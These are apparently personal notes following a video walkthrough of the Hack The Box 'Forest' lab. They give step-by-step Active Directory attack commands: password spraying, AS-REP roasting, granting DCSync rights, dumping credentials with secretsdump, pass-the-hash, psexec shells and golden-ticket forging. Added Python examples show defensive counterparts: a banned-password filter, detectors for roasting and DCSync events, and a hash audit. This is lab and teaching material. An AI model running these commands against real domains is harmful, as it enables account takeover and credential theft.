Forest HTB (ippsec) - follow-through

  • try to enumerate SMB

  • try to find host names with nslookup, querying the DNS server on

    • 127.0.0.1

    • the actual IP

  • ldapsearch -x -h IP -s base namingcontexts (find domain info: the naming contexts give you the base DN)

  • ldapsearch -x -h IP -b "DC=htb,DC=local" '(objectClass=Person)' ATTRIBUTES (what you want to see)

    • for the attribute part you can put whatever you want, e.g. sAMAccountName

    • we can use (objectClass=user) instead of Person, too

we can do a password spray once we have the account names.

grep sAMAccountName | awk '{print $2}' prints the second field (the account name).

make a user list with the valid users (no need to include the guest account or names ending with $, which are machine accounts -- valid user names are generally short)

Let's crack them with password!

password list should be short.

Months, Spring, Summer, Winter, Autumn, Fall, Password, Password123, P@ssw0rd, Secret

for i in $(cat pwlist.txt); do echo $i; echo ${i}2019; echo ${i}2020; done

  • this adds a year at the end of each word.

hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rule

This mutates the passwords and prints a new password list (redirect it to a file)

  • add a ! at the end of each word

  • for i in $(cat pwlist.txt); do echo "$i"; echo "${i}!"; done

Another technique

  • hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles1.rule | sort -u

    • this toggles the case of different letters; append | awk 'length($0) > 8' to keep only words longer than 8 characters (to match the minimum password length)
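The mutations above (year suffix, trailing "!", case toggling, leetspeak) are exactly what a server-side banned-password filter has to undo before comparing a new password against a denylist. The following Python is an added example, not from ippsec's video or these notes: the stem list, the substitution table and the candidate passwords are assumptions constructed for the demonstration.

```python
import re

# Stems the seasonal spray list above is built from. This is an assumed starter
# set; a real filter adds the company name, products, local teams and so on.
BANNED_STEMS = {
    "password", "secret", "welcome",
    "spring", "summer", "autumn", "fall", "winter",
    "january", "february", "march", "april", "may", "june", "july",
    "august", "september", "october", "november", "december",
}

# Undo the usual substitutions so P@ssw0rd and Passw0rd collapse to "password".
LEET = str.maketrans({"@": "a", "4": "a", "0": "o", "3": "e", "1": "i",
                      "$": "s", "5": "s", "7": "t"})

# Digits and symbols glued on by the year / "!" loops and the hashcat rules.
JUNK = r"[0-9!@#$%^&*.?_+\-]+"
TRAILING_JUNK = re.compile(JUNK + r"$")
LEADING_JUNK = re.compile(r"^" + JUNK)


def stem_of(password: str) -> str:
    """Reduce a candidate to the dictionary word it was mutated from.
    Order matters: strip affixes first, then undo leetspeak, otherwise the
    '2020' in Summer2020 would be read as letters. (A word that itself starts
    with a digit substitution, like 0range, loses its first letter; that is
    acceptable for a denylist check.)"""
    s = password.lower()
    s = TRAILING_JUNK.sub("", s)   # summer2020! -> summer
    s = LEADING_JUNK.sub("", s)    # !summer -> summer
    return s.translate(LEET)       # p@ssw0rd -> password


def check_password(password: str, min_length: int = 8):
    """Return (weak, reason). Case toggling, year and '!' suffixes and
    leetspeak all collapse to the same stem, so one set lookup covers every
    mutation the wordlist above generates."""
    if len(password) < min_length:
        return True, f"shorter than {min_length} characters"
    stem = stem_of(password)
    if stem in BANNED_STEMS:
        return True, f"banned stem '{stem}'"
    return False, "ok"


if __name__ == "__main__":
    # Constructed candidates, the first three are spray-list style.
    for candidate in ["Summer2020!", "P@ssw0rd", "Autumn2019", "correct-horse-battery-staple"]:
        print(candidate, check_password(candidate))
```

Hook `check_password` into whatever sets passwords (a password filter DLL, an IdP policy hook, a self-service reset page); the point is that the filter reasons about the stem, so adding a year or a "!" does not get a banned word past it.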

Dump password policy

  • crackmapexec smb IP --pass-pol

  • crackmapexec smb IP --pass-pol -u '' -p '' (null session attempt)

  • enum4linux

Manual way to look up the password policy

if it's showing something like below, it's doing rpc

do rpcclient -U '' -N IP

and once logged in:

  • enumdomains

  • enumdomusers

  • queryusergroups 0x47b (the user's rid)

  • querygroup grouprid to see what kind of group it is

  • queryuser rid to see the user's details and password info

Spray the passwords

crackmapexec smb IP -u userlist.out -p pwlist.out

----

impacket's GetNPUsers.py -dc-ip IP -request 'htb.local/' -format hashcat

looks for accounts that don't require Kerberos pre-authentication and dumps their AS-REP hashes.

and crack the output
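The detection side of this step: when the KDC hands out a TGT to an account that does not require pre-authentication, the 4768 event it logs carries Pre-Authentication Type 0, and a roasting tool will normally have asked for RC4 (encryption type 0x17). The Python below is an added example, not from ippsec or these notes; the key=value export format, the account names (svc-alfresco is the one from the notes) and the addresses are constructed for the demonstration.

```python
import re

# Constructed sample of Kerberos TGT-request events (ID 4768) as key=value
# lines, the way a SIEM might export them. PreAuthType=0 is what the KDC
# records when it issued the TGT without pre-authentication (the account has
# "Do not require Kerberos preauthentication" set); 0x17 is RC4, the cipher
# an AS-REP roasting tool asks for because it cracks fastest.
SAMPLE_EVENTS = """\
EventID=4768 TargetUserName=svc-alfresco PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.0.0.50 Status=0x0
EventID=4768 TargetUserName=alice PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.0.0.20 Status=0x0
EventID=4768 TargetUserName=DC01$ PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.0.0.10 Status=0x0
EventID=4768 TargetUserName=svc-alfresco PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.0.0.50 Status=0x0
EventID=4769 TargetUserName=svc-alfresco@HTB.LOCAL ServiceName=DC01$ TicketEncryptionType=0x12 IpAddress=10.0.0.50
EventID=4768 TargetUserName=bob PreAuthType=0 TicketEncryptionType=0x12 IpAddress=10.0.0.10 Status=0x0
EventID=4768 TargetUserName=nobody PreAuthType=- TicketEncryptionType=0xffffffff IpAddress=10.0.0.50 Status=0x6
"""

FIELD = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str) -> dict:
    """One key=value line -> dict of strings."""
    return dict(FIELD.findall(line))


def asrep_roastable_requests(text: str) -> list:
    """(account, encryption type, source IP) for each TGT issued without
    pre-authentication; deduplicated and sorted so repeats collapse."""
    hits = set()
    for line in text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "4768" or ev.get("PreAuthType") != "0":
            continue
        if ev.get("Status") != "0x0":   # failed request, no AS-REP was returned
            continue
        hits.add((ev["TargetUserName"], ev["TicketEncryptionType"], ev["IpAddress"]))
    return sorted(hits)


def accounts_to_fix(text: str) -> list:
    """Accounts whose DONT_REQ_PREAUTH flag should be removed."""
    return sorted({user for user, _, _ in asrep_roastable_requests(text)})


if __name__ == "__main__":
    for user, enc, ip in asrep_roastable_requests(SAMPLE_EVENTS):
        print(f"{user:15} enc={enc} from {ip}" + ("  (RC4 requested)" if enc == "0x17" else ""))
    print("fix:", accounts_to_fix(SAMPLE_EVENTS))
```

Rather than waiting for the event, the same accounts can be listed proactively from a domain-joined host with the ActiveDirectory module: `Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true}`. Any hit that is not a documented exception should have the flag cleared.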

-----

crackmapexec smb IP -u svc-alfresco -p s3rvice --shares

lists the shares this account can reach

---

Use evil-winrm

./evil-winrm.rb -u user -p pass -i IP

---> this should get you a shell as the service account

---

Priv Esc

BloodHound

On Kali:

  • download the zip file and the BloodHound application file separately.

  • After downloading, unzip the application file.

  • Download neo4j

  • neo4j console -> set a new password (default is neo4j) by visiting localhost:PORT

  • Now run BloodHound with ./BloodHound --no-sandbox and log in

On the victim's machine, upload SharpHound.exe (or run it from a mounted drive):

./SharpHound.exe -c all

On Kali,

  • drop the zip file SharpHound produced onto the BloodHound window, which starts the import

In the search bar, type in the user you already control and mark it as owned

-> Show paths from owned principals -> shows a map

If you see the Account Operators group, its members can create users

On the victim's machine,

net user gori gorigori /add /domain

this creates a domain account gori with the password gorigori.

net group "Exchange Windows Permissions" gori /add /domain

net group "Exchange Windows Permissions" /domain will verify that the user has been added.

On BloodHound, click the "WriteDacl" edge > Abuse Info

Add-DomainObjectAcl -Credential $cred -TargetIdentity testlab.local -Rights DCSync

This is a PowerView command.

Download the dev branch of PowerSploit with -b dev on git clone

copy PowerView.ps1 over to the victim's machine and import it.

$pass = ConvertTo-SecureString 'gorigori' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential('HTB\gori', $pass)

Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity gori -Rights DCSync

Then on Kali,

use impacket's secretsdump.py htb/gori:gorigori@IP

grab the last :HASH: part (the NT hash) of the Administrator line

Use or crack the hash

crackmapexec smb IP -u administrator -H HASH (pass-the-hash check)

psexec.py htb.local/Administrator:Pass@10.129.138.20

This should get you a root shell.
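Both halves of the escalation above leave a distinct trace on the domain controller: the WriteDacl abuse rewrites nTSecurityDescriptor on the domain object (event 5136, when object auditing is enabled on the domain head), and the DCSync itself is a 4662 event whose Properties field carries the replication control-access-right GUIDs, raised by a principal that is not a domain controller. The Python below is an added example, not from ippsec or these notes; the key=value export format, the DC name DC01$, the user alice and the event lines are constructed (gori is the account the notes create).

```python
import re

# Well-known schema GUIDs of the replication control-access rights. They show up
# in the Properties field of a 4662 event when someone pulls directory changes,
# which is what secretsdump.py does with DCSync.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed sample events. DC01$ is a made-up domain controller whose own
# replication is expected; alice exercises an unrelated right
# (User-Force-Change-Password) on a user object; gori is the account from the notes.
SAMPLE_EVENTS = """\
EventID=5136 SubjectUserName=gori ObjectDN=DC=htb,DC=local AttributeLDAPDisplayName=nTSecurityDescriptor
EventID=4662 SubjectUserName=DC01$ ObjectType=%{19195a5b-6da0-11d0-afd3-00c04fd930c9} Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectUserName=gori ObjectType=%{19195a5b-6da0-11d0-afd3-00c04fd930c9} Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectUserName=alice ObjectType=%{bf967aba-0de6-11d0-a285-00aa003049e2} Properties={00299570-246d-11d0-a768-00aa006e0529}
"""

FIELD = re.compile(r"(\w+)=(\S+)")
GUID = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}")


def parse_event(line: str) -> dict:
    """One key=value line -> dict of strings (a value runs to the next space,
    so ObjectDN=DC=htb,DC=local survives intact)."""
    return dict(FIELD.findall(line))


def dcsync_alerts(text: str, domain_controllers: set) -> list:
    """(principal, [rights]) for every 4662 in which a non-DC principal used a
    replication right. Pass the real DC computer accounts; anything else
    replicating the directory is an alert."""
    dcs = {dc.upper() for dc in domain_controllers}
    alerts = []
    for line in text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        rights = [REPLICATION_GUIDS[g]
                  for g in GUID.findall(ev.get("Properties", "").lower())
                  if g in REPLICATION_GUIDS]
        if rights and ev["SubjectUserName"].upper() not in dcs:
            alerts.append((ev["SubjectUserName"], rights))
    return alerts


def acl_change_alerts(text: str, domain_dn: str) -> list:
    """Principals that rewrote the security descriptor of the domain object
    (event 5136). This is the WriteDacl step that grants the rights above."""
    return [ev["SubjectUserName"]
            for ev in map(parse_event, text.splitlines())
            if ev.get("EventID") == "5136"
            and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"
            and ev.get("ObjectDN", "").lower() == domain_dn.lower()]


if __name__ == "__main__":
    print("ACL rewritten on domain object by:", acl_change_alerts(SAMPLE_EVENTS, "DC=htb,DC=local"))
    for who, rights in dcsync_alerts(SAMPLE_EVENTS, {"DC01$"}):
        print(f"DCSync-style replication by {who}: {', '.join(rights)}")
```

The list of domain controllers is the one piece of environment knowledge the rule needs; Azure AD Connect and similar legitimate replicators go into the same allow-set. A 5136 on the domain head followed shortly by a 4662 from the same principal is the sequence the notes above produce.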

---

Another way to crack

NTLM password cracking:

grep ::: hash.out | awk -F: '{print $1":"$4}' > new_hashes.out

and then

hashcat --user -m 1000 new_hashes.out rockyou.txt -r rules/InsidePro-PasswordsPro.rule

  • --user makes hashcat recognise the "user:hash" format

  • --show prints the cracked hashes together with their users
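The grep/awk pipeline above is a one-off conversion; the same secretsdump line format is also what a domain password audit reads, where the interesting findings are accounts sharing an NT hash (same password) and accounts with the empty-password hash. The Python below is an added example, not from ippsec or these notes; the dump lines are constructed with made-up hex hashes, and the only real value is the well-known NT hash of the empty password.

```python
import re
from collections import defaultdict

# NT hash of the empty string: any enabled account carrying it has no password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed secretsdump-style output (domain\user:rid:lmhash:nthash:::).
# The NT hashes below are made-up hex strings, not real credential material;
# the LM field is the usual "no LM hash" constant.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
htb.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
htb.local\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
htb.local\\alice:1104:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
htb.local\\bob:1105:aad3b435b51404eeaad3b435b51404ee:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:::
htb.local\\DC01$:1000:aad3b435b51404eeaad3b435b51404ee:bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb:::
[*] Cleaning up...
"""

# Optional "domain\" prefix, then user:rid:lm:nt::: ; status lines do not match.
LINE = re.compile(r"^(?:[^\\:]+\\)?([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::", re.I)


def parse_secretsdump(text: str) -> list:
    """Return [{'user','rid','nt'}] for every credential line, in file order."""
    entries = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            user, rid, _lm, nt = m.groups()
            entries.append({"user": user, "rid": int(rid), "nt": nt.lower()})
    return entries


def hashcat_user_lines(entries: list) -> list:
    """The 'user:hash' form that hashcat --user -m 1000 expects (same as the
    awk one-liner, with the domain prefix dropped)."""
    return [f"{e['user']}:{e['nt']}" for e in entries]


def audit(entries: list) -> dict:
    """Findings a defender wants before anyone bothers cracking: empty
    passwords and password reuse across accounts (identical NT hash)."""
    by_hash = defaultdict(list)
    for e in entries:
        by_hash[e["nt"]].append(e["user"])
    return {
        "empty_password": by_hash.get(EMPTY_NT, []),
        "shared_hash": {h: users for h, users in by_hash.items()
                        if len(users) > 1 and h != EMPTY_NT},
    }


if __name__ == "__main__":
    found = parse_secretsdump(SAMPLE_DUMP)
    print("\n".join(hashcat_user_lines(found)))
    print(audit(found))
```

On a real dump, disabled accounts (Guest is disabled by default) should be filtered with the account-status information from the directory before the empty-password list is treated as a finding; the hash alone does not say whether the account is enabled.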

----

Golden Ticket method

copy the krbtgt hash from the secretsdump output.

On the victim's machine, run the following command to get the domain SID (needed for -domain-sid)

Get-ADDomain htb.local

Golden ticket with Impacket examples:

# To generate the TGT with the krbtgt NTLM hash
python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>

# To generate the TGT with the krbtgt AES key
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>

# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

# The user name can be anything.

  • an IP address should not be used for the remote_hostname. Always add the host name to the hosts file.

if it says the time is wrong, we have to change our time --- nmap shows the clock skew.

date -s TIME

to change the time
